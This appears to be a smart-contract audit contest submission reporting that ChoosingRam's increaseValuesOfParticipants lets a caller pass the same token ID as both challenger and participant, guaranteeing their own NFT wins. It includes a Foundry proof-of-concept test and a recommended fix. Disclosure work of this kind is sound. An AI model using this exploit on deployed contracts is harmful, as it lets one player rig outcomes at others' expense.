Submission Details
Severity:
Certainty of updating the own NFT in 'ChoosingRam__increaseValuesOfParticipants'
Summary
In the function 'increaseValuesOfParticipants' in 'ChoosingRam' contract, sender has the certainty to update his own NFT.
Vulnerability Details
The sender in this case can set the 'tokenIdOfChallenger' as one the tokenId that he owns, but he can also give the same tokenId to 'tokenIdOfAnyPerticipent' parameter.
##PoC
function test_canIncreaseValuesOfPartcipants_tokenIdOfChallengerAndPartcipantAretheSame() public {
vm.startPrank(address(this));
ramNft.setChoosingRamContract(address(choosingRam));
vm.stopPrank();
address casualAddress1 = address(123);
vm.startPrank(casualAddress1);
ramNft.mintRamNFT(casualAddress1);
vm.stopPrank();
address casualAddress2 = address(124);
vm.startPrank(casualAddress2);
ramNft.mintRamNFT(casualAddress2);
vm.stopPrank();
address casualAddress3 = address(125);
vm.startPrank(casualAddress3);
ramNft.mintRamNFT(casualAddress3);
address casualAddress4 = address(126);
vm.startPrank(casualAddress4);
ramNft.mintRamNFT(casualAddress4);
choosingRam.increaseValuesOfParticipants(3, 3);
choosingRam.increaseValuesOfParticipants(3, 3);
choosingRam.increaseValuesOfParticipants(3, 3);
choosingRam.increaseValuesOfParticipants(3, 3);
choosingRam.increaseValuesOfParticipants(3, 3);
}
Impact
Sender has the certainty to update his own NFT and become ram.
Tools Used
Manual review
Recommendations
Make sure that 'tokenIdOfChallenger' and 'tokenIdOfAnyPerticipent' are not the same.
Rewards breakdown
nSLOC
218This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.